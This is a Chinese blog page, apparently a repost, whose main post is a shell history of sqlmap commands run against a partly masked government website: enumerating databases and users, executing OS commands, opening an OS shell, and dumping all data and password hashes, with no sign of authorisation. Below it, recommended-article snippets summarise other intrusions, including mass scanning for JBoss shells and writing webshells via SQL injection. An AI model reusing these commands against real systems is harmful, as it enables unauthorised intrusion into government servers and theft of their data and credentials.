今天的一次渗透

最新推荐文章于 2024-06-20 16:25:01 发布
最新推荐文章于 2024-06-20 16:25:01 发布
阅读量108 收藏
点赞数
原文链接:https://my.oschina.net/xiaocon/blog/199418
版权

这次渗透没有什么亮点,主要就是SQLMAP。这玩意很给力。直接给干掉了。。。

 2005  sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --dbs --threads 10
 2006  sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --users --threads 10
 2007  sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --os-cmd="net user" --threads 10
 2008  sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --os-cmd=dir --threads 10
 2009  sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --os-shell --threads 10
 2010  sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --dump-all --threads 10
 2011  sqlmap -u "http://xxx.gov.cn/xxxx/dek.jsp?id=17" --passwords --threads 10

mark 一下..

转载于:https://my.oschina.net/xiaocon/blog/199418

chiqu8683
关注
对某小程序的一次渗透记录
布啦啦
03-25 659
最近报了一个驾校,然后在报名回家以后,就开始疯狂的挂科目一的时长,突然想到这个小程序会不会存在漏洞呢,如果发现了,还可以去CNVD(https://www.cnvd.org.cn/)报一下,一是拿个积分,二是间接修复一下漏洞,毕竟自己的所有信息都在这个小程序里,不想自己有一天因为它存在什么漏洞,导致自己的信息被人偷走,所以本着保护自己的原则,我开始了一次【试探】。具体是哪个小程序,这里我就不说啦,漏洞已经报到CNVD了,写本文只是做一个分享。
一次曲折的渗透测试经历
乐枕的家
04-21 1万+
昨天把jexboss脚本整合到我的多线程框架里,扫了一遍全国jboss,发现一千多个shell.工具地址在:https://github.com/Xyntax/POC-T随意拿了一个看似大厂商的,作本次入侵测试发现传送门通过jexboss拿到shell,看到是centos的机器(IP已打码).看起来是root,确认一下.不稳定的传送门shell的问题接下来执行命令的时候,发现这个jexboss自带的
一次渗透
cxk
08-12 750
注入 1)网站首页 2)简单and 1=1 ,1=2判断注入点 3)order by 确定字段数为9,显示位union select 1,2…判断为4和8 4)判断权限 root权限,思考使用into outfile直接写shell或者是外联数据库,使用日志getshell 5)into outfile写shell。判断mysql版本为5.5,既必须查看secure-file-priv导...
一次渗透经历
wuliyouMaozhi的博客
08-31 525
每一个参数都有可能是我们渗透成功的利刃,不要因为个别参数不行而放弃所有参数。
一次渗透经验分享
win176489的博客
05-28 1421
**一次渗透经验分享** 通过在网上看到好多大佬们使用msf工具来进行渗透测试,然后出于学习和探索工具的功能,自己在本地搭建了一个asp的靶场环境进行渗透。效果还是很不错的。 测试环境:目标机 windows2003 192.168.42.132 攻击机 kali 192.168.43....
一次完整的渗透测试
weixin_33729196的博客
05-29 1221
目标网站:39.xxx.xxx.xxx 一阶段前台测试: 1、前台存在登陆入口且无验证码(肯定要暴力破解啊) 2、前台url参数处加敏感字符数据库报错存在sql注入 3、前台登陆处输入危险字符,数据库报错存在post注入 测试结果如下: 暴力破解获得 用户名:admin 密码:123456 利用sqlmap跑注入并没有跑出任何数据 ...
一次某单位的内网渗透测试
最新发布
黑战士的博客
06-20 693
网卡信息、补丁信息、杀毒进程、用户在线情况、是否存在域、翻文件查找数据库密码、浏览器保存密码、查看路由等。使用越权加文件上传拿到shell。192.168.xx.x 管理员。通过哥斯拉上线msf。
一次曲折的渗透测试之旅1
08-03
在本文中,作者分享了一次具体的渗透测试经历,这是一次授权测试,即得到目标网站所有者的许可进行的测试。首先,进行了信息收集阶段,这是渗透测试的第一步。通过扫描子域名和端口,获取目标系统的基本信息。在这次...
088-一次迂回的渗透测试之旅.pdf
09-20
088-一次迂回的渗透测试之旅.pdf
记录一次模拟渗透
0verWatch的博客
07-25 581
前言 今天还模拟了一次真实的挖洞过程,今天这网站一共有三个漏洞(都是要经过提醒才能弄出来),因为是搭的环境,简单记录一下思路,顺便当个回顾,源码啥的都没有了,耍完就要求删掉了。 正文 这台服务器有个前提就是跟我们一个网段的服务器,并且开了IIS服务,但是前提我们是不知道他的ip的,这个时候我们需要用一下nmap来扫一下同一网段下的ip nmap -sP -PI -PT 192.16...
MSF(1)——一次完整的渗透流程
realmels的博客
09-04 4074
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 SQL注入(2)——各种注入 SQL注入(3)——SQLMAP SQL注入(4)——实战SQL注入拿webshell Vulnhub靶机渗透之Me and My Girlfriend XSS漏洞 文件上传漏洞 文件.
一次渗透的具体过程
lianxiangbus
04-04 231
渗透的具体过程 朋友做了一个财务部门的项目,今天叫我来做免费的渗透测试,下面来谈谈这次的过程和体会。先来介绍一下子服务器的基本情况,windows2000advserver中文版,据称打过了sp3,asp+iis+mssql。首先扫描了一下子端口,呵呵,开始的一般步骤。端口21开放:FTP(Control)端口80开放:HTTP,WorldWideWeb端口135开放:LocationServ...
记录一次渗透的思路
派大李的博客
11-26 302
信息收集就略过了。。。 尝试弱口令成功进入后台。。 弱口令简直就是 0day啊!!! 后台界面。。 进到后台就要getshell,找到上传点,burp改包成功上传冰蝎 拼接url地址访问 成功连接,环境是phpstudy搭建的,windows2012的服务器 系统函数都被禁用,执行不了命令,突破: phpstudy搭建的环境权限都很大,可以跨目录,直接修改php.ini配置文件 成功执行命令:whoami 是个管理员权限,接下来就是重头戏了,本人在这里翻车了。。。 提权试了许多方法,奈何我太
一次渗透测试的方法
weixin_45729221的博客
06-05 262
网络安全人员与真正黑客的主要区别就是目的不通。我们通常的目的是为了加强网站的安全性,模拟黑客攻击网站是测试网站的安全性,所以我们可以以正规的名义搞事情了(别真的搞破坏,点到为止)。 首先我们们找到一个网站来作为受害者,比如阿里巴巴(肯定会失败,只是演示流程,不要较真) 首先了解该网站的IP地址:cmd nslookup(被打码的就是) 检测cms:一般大网站都是自己写为网页, 御剑识别指纹,和后台网站 假如,我们识别到了该网站指纹,就可以通过百度查找它的对应漏洞,进行攻击。 除了
一次渗透测试实战
热门推荐
m0_46467017的博客
04-23 2万+
一次渗透测试实战前言信息收集漏洞验证漏洞攻击Grafana任意文件读取漏洞(CVE-2021-43798)一、漏洞描述二、漏洞影响范围Payload:ActiveMQ 任意文件上传漏洞(CVE-2016-3088)一、漏洞描述二、漏洞影响范围三、漏洞利用:写入webshell权限提升CVE-2021-4034 Linux polkit 提权漏洞一、漏洞描述二、影响版本三、漏洞利用总结 前言 学习了一两个月的安全,为了对自己的一个学习水平做一个总结,所以我特地找来一个网站来进行一次渗透实战。 信息收集 这次的
一次小网站渗透过程
Delity的博客
04-21 8811
一、序言 记录某一次无意点开的一个小网站的渗透过程,幸运的是搭建平台是phpstudy,cms是beecms,beecms有通用漏洞,然后去网上找了资料,成功getshell并获取服务器权限。 二、渗透过程 无意点开一个网站,发现网站比较小,且看起来比较老,然后发现logo没有改,于是乎去百度搜索这个cms,发现有通用漏洞,这里贴一个链接:Beecms 通用漏洞 这里运气比较好,没有更改后台地...
一次完整的渗透测试实验
江左盟的博客
05-10 1万+
渗透测试的一般思路 侦查 信息收集 漏洞扫描 漏洞利用 提升权限 保持连接 本次实验只用到信息收集,漏洞扫描及漏洞利用 攻击机:Kali2.0 64位(192.168.41.131) 目标机:Win7 64位(192.168.41.137) 本次实验用到的知识 Nmap: -A 详细扫描操作系统指纹识别和版本检测 -sS SYN扫描(半连接扫描) -sT...
如何成功实现一次渗透测试
04-15
如果你想在网络中执行渗透测试,你需要首先确定你的目标是什么。一旦你找到了目标系统,你可能需要使用漏洞扫描工具来寻找系统中已知的漏洞。如果你找到了漏洞,你可以通过利用漏洞来获取对系统的访问权限。在实际的实施过程中,你可能需要一些专业的工具和技术,如密码爆破、社交工程和漏洞利用等。最关键的是,你需要确保你已经经过授权并拥有完整的许可证,这样你才能进行渗透测试,否则你可能会面临严重的法律问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值